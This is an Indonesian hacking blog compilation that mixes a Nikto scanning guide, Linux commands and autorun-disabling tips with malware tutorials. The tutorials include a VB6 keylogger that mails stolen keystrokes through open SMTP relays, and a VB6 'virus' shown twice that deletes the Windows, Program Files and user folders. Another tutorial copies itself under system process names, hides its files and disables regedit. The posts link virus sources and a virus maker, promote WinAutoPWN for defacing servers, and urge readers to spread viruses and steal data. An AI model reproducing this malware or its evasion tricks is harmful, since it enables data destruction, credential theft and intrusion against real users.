WINAUTOPWN

WINAUTOPWN

WinAutoPWN merupakan sebuah tools yang digunakan untuk mengexploitasi secara langsung Windows Framework, sehingga secara otomatis kita yang akan menjadi administrator di windows tersebut. Banyak digunakan oleh “Defacer” Indonesia untuk melakukan deface terhadap Windows Server 

Download WinAutoPWN Disini:

Cara Scan Kelemahan Website Dengan Nikto 2.03/2.04

Kali ini posting Tentang [ Cara Scan Kelemahan Website Dengan Nikto 2.03/2.04  ]
Yang dibutuhkan untuk menjalankan Nikto di Windows adalah
[1] Activeperl Untuk Windows - saya menggunakan ActivePerl-5.8.9.826-MSWin32-x86-290470 standard untuk windows XP 32 bit pada mesin x86

http://downloads.activestate.com/ActivePerl/releases/5.16.1.1601/

[2] Nikto 2.03/2.04 yang telah di setting untuk berjalan di Windows -

Download : http://www.4shared.com/file/180829903/6d385b54/nikto.html

Instalasi:
[1] Install Active Perl
[2] Ekstrak Nikto yang telah di download ke C:\nikto

Penggunaan
[1] Jalankan Nikto melalui cmd start - run - cmd lalu drag dan drop nikto.pl ke command prompt dan ketik

-h www.target.com

Nikto akan mencari informasi dan menampilkan kelemahan yang ditemukan di dalam server web tersebut. Nikto juga bisa dijalankan dengan beberapa windows baru untuk mencari kelemahan lebih dari satu website.

Daftar Perintah Dasar Linux

daftar perintah di Terminal!
Privileges
sudo command - run command as root
sudo su - open a root shell
sudo su user - open a shell as user
sudo -k - forget sudo passwords
gksudo command - visual sudo dialog (GNOME)
kdesudo command - visual sudo dialog (KDE)
sudo visudo - edit /etc/sudoers
gksudo nautilus - root file manager (GNOME)
kdesudo konqueror - root file manager (KDE)
passwd - change your password

Display
sudo /etc/init.d/gdm restart - restart X (GNOME)
sudo /etc/init.d/kdm restart - restart X (KDE)
(file) /etc/X11/xorg.conf - display configuration
sudo dpkg-reconfigure -phigh xserver-xorg - reset X configuration
Ctrl+Alt+Bksp - restart X display if frozen
Ctrl+Alt+FN - switch to tty N
Ctrl+Alt+F7 - switch back to X display

System Services¹
start service - start job service (Upstart)
stop service - stop job service (Upstart)
status service - check if service is running (Upstart)
/etc/init.d/service start - start service (SysV)
/etc/init.d/service stop - stop service (SysV)
/etc/init.d/service status - check service (SysV)
/etc/init.d/service restart - restart service (SysV)
runlevel - get current runlevel
Package Management¹
apt-get update - refresh available updates
apt-get upgrade - upgrade all packages
apt-get dist-upgrade - upgrade Ubuntu version
apt-get install pkg - install pkg
apt-get remove pkg - uninstall pkg
apt-get autoremove - remove obsolete packages
apt-get -f install - try to fix broken packages
dpkg –configure -a - try to fix broken packages
dpkg -i pkg.deb - install file pkg.deb
(file) /etc/apt/sources.list - APT repository list
Network
ifconfig - show network information
iwconfig - show wireless information
sudo iwlist scan - scan for wireless networks
sudo /etc/init.d/networking restart - reset network
(file) /etc/network/interfaces - manual configuration
ifup interface - bring interface online
ifdown interface - disable interface
Special Packages
ubuntu-desktop - standard Ubuntu environment
kubuntu-desktop - KDE desktop
xubuntu-desktop - XFCE desktop
ubuntu-minimal - core Ubuntu utilities
ubuntu-standard - standard Ubuntu utilities
ubuntu-restricted-extras - non-free, but useful
kubuntu-restricted-extras - KDE of the above
xubuntu-restricted-extras - XFCE of the above
build-essential - packages used to compile programs
linux-image-generic - latest generic kernel image
linux-headers-generic - latest build headers
Firewall¹
ufw enable - turn on the firewall
ufw disable - turn off the firewall
ufw default allow - allow all connections by default
ufw default deny - drop all connections by default
ufw status - current status and rules
ufw allow port - allow traffic on port
ufw deny port - block port
ufw deny from ip - block ip adress
Application Names
nautilus - file manager (GNOME)
dolphin - file manager (KDE)
konqueror - web browser/filemanager (KDE)
kate - text editor (KDE)
gedit - text editor (GNOME)

System
Recovery - Type the phrase “REISUB” while
holding down Alt and SysRq (PrintScrn) with
about 1 second between each letter. Your system
will reboot.
lsb_release -a - get Ubuntu version
uname -r - get kernel version
uname -a - get all kernel information

Cara Membuat Trojan Keylogger Menggunakan Vb 6.0( Hacking with Trojan )

adapun hal-hal yang harus anda siapkan antara lain

PC dengan System Operasi Windows ( XP atau apa lah terserah yang penting masih men-support VB 6.0 )
Microsoft Visual Basic 6.0 ( kalo belum punya ya instal dulu lah dodolllll )
Pacul, Sabit, Krenjang dan Linggis ( Hoy Hoy nih bukan mau ngegarap sawah )
Tekad dan niat aja, ente ndak perlu pinter untuk bisa berkarya!!!!!!!!

Apa aja sih yang perlu anda pahami terlebih dahulu ????????

Pertama SMTP : atau sSimple Mail Transfer Protokol adalah sebuah jalur dalam jaringan network yang bertugas mengurusi segala bentuk pengiriman email, baik dari atau menuju server, dia menggunakan port 25, untuk mengetahui apakah SMTP dari sebuah jaringan open / tidak lakukan telnet server dengan cara

masuk ke cmd.exe dan ketikan perintah
Telnet [ip target] [25]
c:\>Telnet 192.898.098.23 25

biasanya kalau open ( mengizinkan pemakaian jalur tersebut untuk mengirimkan email tanpa password ) akan ada report jawaban "Hello" dan sejenisnya, coba2 sendiri lah saya lum ada waktu nyari contoh capture nya.

Kedua : Input yang di rekam oleh keylogger, pada dasarnnya Keylogger berarti .....

Key : Tombol , dalam hal ini tentu saja tombol keyboard
Log : adalah brankas penyimpanan berupa file berekstensi .txt atau .log

jadi keylogger adalah sebuah malware yang berfungsi merekam input yang di pencet oleh keyboard dan menyimpan hasil nya di sebuah file di tempat tersembunyi......kemudian suatu saat tertentu, file log tersebut akan di kirimkan ke email si pembuat via SMTP mail tadi lah,

Log file tersebut bisa berisi ketikan-ketikan huruf yang telah di input korban, kebanyakan pasti kata-kata yang ndak berguna, tapi bisa jadi suatu saat menyimpan password , karena waktu korban login ke apa kek , yahoo, facebook, atau login ke kamar mandi ( hayah ) dia pasti ngetik username dan password nya......bahaya banget kalo korban adalah seorang bisnis manager, pasti dia akan mengerjakan banyak data tentang perusahaan dan keuangan, termasuk PIN kartu kredit ( kali aja loh ndak jamin soalnya )

intinya SAYA BISA JADI HACKER ( nah lo, niat lu aja udah jelek kok, jangan lahhhh.....ini cuman belajar bro.....ndak boleh nakal ya ^_^ )

Setelah semua Di siapkan , buka Visual Basic 6.0 lalu buat 1 Project RUNDLL32 dengan isi sebagai berikut :
1. Satu buah form dengan komponen = 1 label, 3 text box, 2 buah timer, 1 buah SMTP ( nanti ada di user control )

2. Dua buah module dengan nama Internet dan Module 1.
3. Satu buah User Control dengan nama SMTP ( dengan satu komponen Winshock )
Kira-kira seperti ini lah model Project Explorer nya :

Nah jika udah selesai, tinggal memasukan kode aja deh, untuk lebih jelas silahkan download source code nya di sini : Keylogger Code

Di sana sudah saya berikan beberapa panduan dalam line komentar, moga aja ndak bingung, tapi intinya begitu lah, contoh :

Pada Form1
Di sana bagian paling vital adalah tempat anda meletakan SMTP Gratis Sekaligus Portnya, silahkan cari sendiri deh Free SMTP nya, punya saya udah kena Backlist. s1.go.ro dengan port 25 adalah SMTP dari tutorial awal, saya ndak kasih perubahan apa2, yang jelas itu udah ndak bisa di pake.

Pada Module Internet
Modul itu berfungsi untuk melakukan chek pada internet connection di komputer korban, jadi gunanya adalah melakukan testing pada sambungan akses, ia mengirimkan request koneksi ke www.google.com

Pada Module 1
Di sana terdapat banyak kode yang berfungsi untuk menangkap input dari keyboard, yah namanya juga keylogger, udah saya jelaskan definisinya di atas situ..... semua yang di tekan keyboard akan terekam di logs file nya, lalu di kirim ke email tujuan ( milik pembuat keylog ) melalui SMTP gratis yang masih Open. ( sebenarnya bisa menggunakan SMTP berpassword seperti milik gmail, tapi bahayanya, kalau keylogger buatan ente berhasil di crack oleh hacker, maka password anda akan ketauan n keylog ini bisa jadi pagar makan tanaman atau senjata makan tuan, makanya kita menggunakan free SMTP yang ndak berpassword )

Pada User Control SMTP

Wes lah, pada dasarnya user control adalah komponen tambahan dari VB 6.0 yang masih berbentuk kode mentah, (yang mateng pasti berekstensi .ocx atau .dll ) inilah yang membuat keylog bisa di buat secara portabel tanpa melakukan package terlebih dahulu. pada user control ini kita akan melihat banyak sekali kode yag berfungsi untuk mengatur sambungan ke server mail, misalkan apa saja yang akan di kirimkan, apa saja alat pengirimanya, dan data mana yang harus di ambil untuk di transfer ke email. intinya gitu lah.

Udah ya, capek ngetik mulu, download aja kode keylogger nya di sini. yang perlu anda edit hanyalah bagian alamat SMTP gratis, Port yang di gunakan, serta alamat email tujuan pengiriman data.

selamat mencuri data penting orang lain ya dan selamat di penjara kalau ketahuan hahahahaha

Cara Mencegah Virus

Disable Autorun.inf Untuk Menghindari Virus

Beberapa orang ada yang berpikir bahwa file autorun.inf adalah virus, padahal sebenarnya bukan. Autorun.inf adalah suatu sistem file yang digunakan oleh sistem operasi seperti Windows agar secara otomatis menjalankan program ketika removable media seperti CD-ROM, DVD-ROM atau USB Flash dimasukkan di komputer. untuk alasan kenyamanan fitur ini dirancang agar sebuah software yang dipasang pada sebuah disk dapat secara otomatis start saat disk dimasukkan.

Sayangnya autorun.inf ternyata menimbulkan masalah baru. fitur ini dimanfaatkan untuk penyebaran virus. keamanan pengguna pun terancam, mereka yang tidak berniat untuk menjalankan sebuah software terpaksa harus terbelalak dengan kondisi tak mampu berbuat apa-apa untuk menghentikan virus yang langsung berakasi, seperti dalam kasus beberapa virus, yang memanfaatkan fitur ini untuk menyebarkan. ini disebut Sebuah fitur Windows telah gagal ?

Me Non aktifkan AutoPlay bukan solusi karena ketika Anda membuka drive dari My Computer, Windows masih akan menjalankan instruksi yang ditemukan di autorun.inf.

Ada perbedaan antara Autoplay dan Autorun. Autoplay adalah ketika Anda memasukkan CD / DVD atau USB flash drive, Anda mendapatkan kotak dialog yang menanyakan apa yang ingin Anda lakukan Windows, sedangkan autorun akan langsung mengeksekusi perintah yang ada di file autorun.inf. dan ketika ini berjalan tidak ada sama sekali kesempatan bagi Anda untuk membatalkan autorun.

Cara menonaktifkan autorun.

Langkah 1 : Click Start->Run atau tekan tombol Window + R pada keyboard untuk menampilkan kotak dialog Run.

Langkah 2 : Ketik regedit lalu tekan Enter untuk menjalankan Registry Editor.

Langkah 3 : Pada kiri panel klik ganda folder untuk memperluas dan pergi ke

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer

Langkah 4 : Pada panel sebelah kanan double klik NoDriveTypeAutoRun

Langkah 5 : Pada Value Data , ketik FF untuk Heksadesimal atau 255 untuk nilai desimal.

Langkah 6 : Tutup Registry Editor dan restart komputer.

Cara menonaktifkan autorun dengan Notepad

Berikut ini adalah kunci registri yang bisa Anda gunakan untuk mem blok autorun.inf. Buka notepad atau teks editor lainnya, salin teks di bawah ini dan simpan sebagai NoAutoRun.reg. Pastikan save dengan ekstensi . Reg bukan. Txt.

REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIniFileMappingAutorun.inf]
@ = “@ SYS: DoesNotExist”

Jalankan file tersebut, klik Yes jika ada konfirmasi.

Masalah dengan hack ini adalah bahwa installer CD atau DVD tidak akan lagi berjalan secara otomatis, anda harus mencari file setup dengan manual. tapi saya pikir bukanlah masalah besar dibandingkan dengan jika terinfeksi oleh virus dan harus menghabiskan berjam-jam membersihkannya.

Cara Membuat Virus Menggunakan Visual Basic 6.0 Bag II

kali ini saya akan memberikan sedikit tutorial cara membuat virus dengan menggunakan Visual Basic 6.0..

tutorial buat bikin virus sangat mematikan, tapi simple, dan kayanya sih ga bakal kedekteksi antivirus, soalnya cara kerjanya simple banget.

yang anda perlukan antara lain adalah sebagai berikut :
1. VB(optimal : 6.0)

apabila anda ingin mendownload Visual Basic 6.0, klik disini

2. Ngerti tombol2nya VB

tutorialnya begini sob, :

1. bikin form sekecil mungkin

2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function

3.Kode yg berwarna biru itu adalah penangkal nih virus sob, jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang sendiri… bisa kamu edit kok jadi apa gitu…

Yang berwarna merah itu folder yg bakal didelete ama nih virus, kamu edit sendiri aja…

4. Bikin nih project namanya kaya nama system, disini aku memakai nama “SystemKernel32″ jadi ga bakal dicurigain.

5. jangan pernah nulis nama kamu di project ini, okey friend?

6. terakhir ya tinggal di compile deh…

gimana sob, mudah sekali kan?..

sangat Simple kan? nih virus kerjanya ngapus system, jadi sengat berbahaya sekali … ini cman contoh bikin virus…

Sebenarnya bikin virus itu menyenangkan, apalagi klo kita sampai bisa bikin orang kebakaran jengot gara2 virus kita. Aku mau berbagi sedikit ilmu nih tentang cara bikin virus dengan VB 6. Materi ini hanya untuk coba-coba saja atau kata lainnya ini masih dasarnya. Kamu mungkin bisa mengembangkannya sendiri. Oh ya, aku juga menyertakan satu contoh virus yang sudah aku buat namanya r3d_94l4xy. Untuk materi yang lebih berat akan disambung lain waktu. Bagi yang ingin mendapatkan sample virus tertentu dengan source codenya silakan contact Johan.

Pertama, bikin form buat virus kamu pake Standart exe saja

1. Nyembuin Form

Private Sub Form_Load()
App.TaskVisible = False
End Sub

2. Kopiin Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows

On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”

3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori

On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder
Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attributes = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file

On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit

On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry
Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon



On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

Nah sekian dulu materi yang kita pelajari, dari pada pusing, download sample virus r3d_94l4xy dan sebarin ke seluruh penjuru dunia OK!
r3d_94l4xy.rar 180 kb
Berhubung banyaknya permintaan mengenai Sample Virus dalam bentuk VB Project, jadi dibawah ini aku tambahi Source VB nya r3d_94l4xy dan virus lainnya :
r3d_94l4xy (VB_Basic).rar 95 kb
r3d_94l4xy (VB_Extreme).rar 860 kb
Source VB 4 Virus.rar 1297 kb
Trus yang ini adalah software untuk membuat virus dengan mudah, coba deh !
Visual Basic Virus Maker 32 RC 03.rar 1560 kb
Trus yang terakhir ini adalah Artikel tentang Regsitry, bisa kamu pelajari sampai tua!
1001 Malam Mengedit Registry.rar 41 kb
Teknik Bikin Virus Komputer.rar 20 kb
Tak kasih bonus ya Internet Maniac dan Harpot Infeksi Exe, tau kan fungsinya!
Internet Maniac.rar 59 kb
Harpot Infeksi Exe.rar 881 kb
Segini dulu aja ya, soalnya aku lagi persiapan buat lomba Debat Bahasa Inggris di Jember, tanggal 25 November nanti. Dan jangan lupa doain aku biar juara 1, OK ! Dan seperti biasanya, kalau ada pertanyaan, silakan bertanya jangan dipendam. Selamat Belajar !

MEMBUAT ANTIVIRUS

Mungki ini sangat sederhana dan dibuat untuk menangapi tutorial sebelumnya yang tidak lengkap apabila hanya membuat virus saja oke langsung aja deh tanpa basa-basi lagi

Mari kita belajar membuat sebuah AV sederhana, yang diperlukan :

1. Software Visual Basic 6.0

2. Sedikit pemahaman akan pemograman Visual Basic 6.0

3. Sampel file bersih atau virus (- opsional)

• First

Sekarang kita akan belajar membuat sebuah rutin sederhana untuk :

- Memilih file yang akan dicek

- Membuka file tersebut dalam mode binary

- Memproses byte demi byte untuk menghasilkan Checksum
Blog dengan ID 134100 Tidak ada

Buka MS-Visual Basic 6.0 anda, lalu buatlah sebuah class module dan Form dengan menambahkan sebuah objek Textbox, CommonDialog dan Command Button. (Objek CommonDialog dapat ditambahkan dengan memilih Project -> COmponent atau Ctrl-T dan memilih Microsoft Common Dialog Control 6.0). Ketikkan kode berikut pada class module (kita beri nama class module tsb clsCrc) :

================= START HERE ====================

Private crcTable(0 To 255) As Long ‘crc32

Public Function CRC32(ByRef bArrayIn() As Byte, ByVal lLen As Long, Optional ByVal lcrc As Long = 0) As Long

‘bArrayIn adalah array byte dari file yang dibaca, lLen adalah ukuran atau size file

Dim lCurPos As Long ‘Current position untuk iterasi proses array bArrayIn

Dim lTemp As Long ‘variabel temp hasil perhitungan

If lLen = 0 Then Exit Function ‘keluar fungsi apabila ukuran file = 0

lTemp = lcrc Xor &HFFFFFFFF

For lCurPos = 0 To lLen

lTemp = (((lTemp And &HFFFFFF00) &H100) And &HFFFFFF) Xor (crcTable((lTemp And 255) Xor bArrayIn(lCurPos)))

Next lCurPos

CRC32 = lTemp Xor &HFFFFFFFF

End Function

Private Function BuildTable() As Boolean

Dim i As Long, x As Long, crc As Long

Const Limit = &HEDB88320

For i = 0 To 255

crc = i

For x = 0 To 7

If crc And 1 Then

crc = (((crc And &HFFFFFFFE) 2) And &H7FFFFFFF) Xor Limit

Else

crc = ((crc And &HFFFFFFFE) 2) And &H7FFFFFFF

End If

Next x

crcTable(i) = crc

Next i

End Function

Private Sub Class_Initialize()

BuildTable

End Sub

================= END HERE ====================

Lalu ketikkan kode berikut dalam event Command1_Click :

================= START HERE ====================

Dim namaFileBuka As String, HasilCrc As String

Dim CCrc As New clsCrc ‘bikin objek baru dari class ClsCrc

Dim calCrc As Long

Dim tmp() As Byte ‘array buat file yang dibaca

Private Sub Command1_Click()

CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog

CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog

On Error GoTo erorhandle ‘label error handle

CommonDialog1.ShowOpen

namafilbuka = CommonDialog1.FileName

Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary

ReDim tmp(LOF(1)) As Byte ‘deklarasi ulang untuk array

Get #1, , tmp()

Close #1

calCrc = UBound(tmp) ‘mengambil ukuran file dari array

calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC

HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric

Text1.Text = HasilCrc ‘tampilkan hasilnya

Exit Sub

erorhandle:

If Err.Number <> 32755 Then MsgBox Err.Description ‘error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file

================= END HERE ====================

Coba anda jalankan program diatas dengan memencet tombol F5, lalu klik Command1 untuk memilih dan membuka file. Maka program akan menampilkan CRC32nya.

• Second

Kode diatas dapat kita buat menjadi sebuah rutin pengecekan file suspect virus dengan antara membandingkan hasil CRC32nya dan database CRC kita sendiri. Algoritmanya adalah :

- Memilih file yang akan dicek

- Membuka file tersebut dalam mode binary

- Memproses byte demi byte untuk menghasilkan Checksum

- Buka file database

- Ambil isi file baris demi baris

- Samakan Checksum hasil perhitungan dengan checksum dari file

Format file database dapat kita tentukan sendiri, misal :

- FluBurung.A=ABCDEFGH

- Diary.A=12345678

Dimana FluBurung.A adalah nama virus dan ABCDEFGH dalah Crc32nya. Jika kita mempunyai format file seperti diatas, maka kita perlu membaca file secara sekuensial per baris serta memisahkan antara nama virus dan Crc32nya. Dalam hal ini yang menjadi pemisah adalah karakter ‘=’.

Buat 1 module baru (- diberi nama module1) lalu isi dengan kode :

================= START HERE ====================

Public namaVirus As String, CrcVirus As String ‘deklarasi variabel global untuk nama dan CRC virus

Public pathExe as String ‘deklarasi variabel penyimpan lokasi file EXE AV kita

Public Function cariDatabase(Crc As String, namaFileDB As String) As Boolean

Dim lineStr As String, tmp() As String ‘variabel penampung untuk isi file

Open namaFileDB For Input As #1 ‘buka file dengan mode input

Do

Line Input #1, lineStr

tmp = Split(lineStr, “=”) ‘pisahkan isi file bedasarkan pemisah karakter ‘=’

namaVirus = tmp(0) ‘masukkan namavirus ke variabel dari array

CrcVirus = tmp(1) ‘masukkan Crcvirus ke variabel dari array

If CrcVirus = Crc Then ‘bila CRC perhitungan cocok/match dengan database

cariDatabase = True ‘kembalikan nilai TRUE

Exit Do ‘keluar dari perulangan

End If

Loop Until EOF(1)

Close #1

End Function

================= END HERE ====================

Lalu tambahkan 1 objek baru kedalam Form, yaitu Command button2. lalu ketikkan listing kode berikut kedalam event Command2_Click :

================= START HERE ====================

If Len(App.Path) <= 3 Then ‘bila direktori kita adalah root direktori

pathEXE = App.Path

Else

pathEXE = App.Path & “”

End If

CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog

CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog

On Error GoTo erorhandle ‘label error handle

CommonDialog1.ShowOpen

namafilbuka = CommonDialog1.FileName

Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary

ReDim tmp(LOF(1)) As Byte ‘deklarasi ulang untuk array

Get #1, , tmp()

Close #1

calCrc = UBound(tmp) ‘mengambil ukuran file dari array

calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC

HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric

If cariDatabase(HasilCrc, pathEXE & “DB.txt”) Then ‘bila fungsi bernilai TRUE

MsgBox “Virus ditemukan : ” & namaVirus ‘tampilkan message Box

End If

Exit Sub

erorhandle:

If Err.Number <> 32755 Then MsgBox Err.Description ‘error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file

Selamat mencoba dan semoga sukses,, ,, ,
tunggu update selanjut nya ya kawan ,
jangan lupa tinggalkan komentar!ok!

Cara Membuat Virus Menggunakan Visual Basic 6.0

Cara Membuat Virus Mematikan dengan Visual Basic 6.0

hallo brotha, kali ini saya akan memberikan sedikit tutorial cara membuat virus dengan menggunakan Visual Basic 6.0

tutorial untuk membuat virus yang sangat mematikan, but simple, dan kayanya sih ga bakal kedekteksi antivirus, soalnya cara kerjanya simple banget.

yang anda perlukan antara lain adalah sebagai berikut : 
1. VB(optimal : 6.0)

Jika anda ingin mendownload Visual Basic 6.0, klik disini
2. Ngerti tombol2nya VB

tutorialnya :

1. buat sebuah form sekecil mungkin
2. didalam form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function

3. Kode yg berwarna biru itu adalah penangkal nii virus,  jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, kamu ga bakal keserang sendiri. Bisa kamu edit semaunya . .

Yang berwarna merah itu folder yang bakal didelete ama nii virus, kamu edit sendiri aja . .

4. Bikin nih project namanya kaya nama system, disini aku memakai nama “SystemKernel32″ jadi ga bakal dicurigain.

5. jangan pernah nulis nama kamu di project ini, okey friend?

6. terakhir yaa tinggal di compile deh… 

gimana , mudah sekali kan?..  

 sangat Simple kan? nih virus kerjanya  ngehapus system, jadi sangat berbahaya sekali, ni cman contoh bikin virus, jangan disalah gunakan yaa .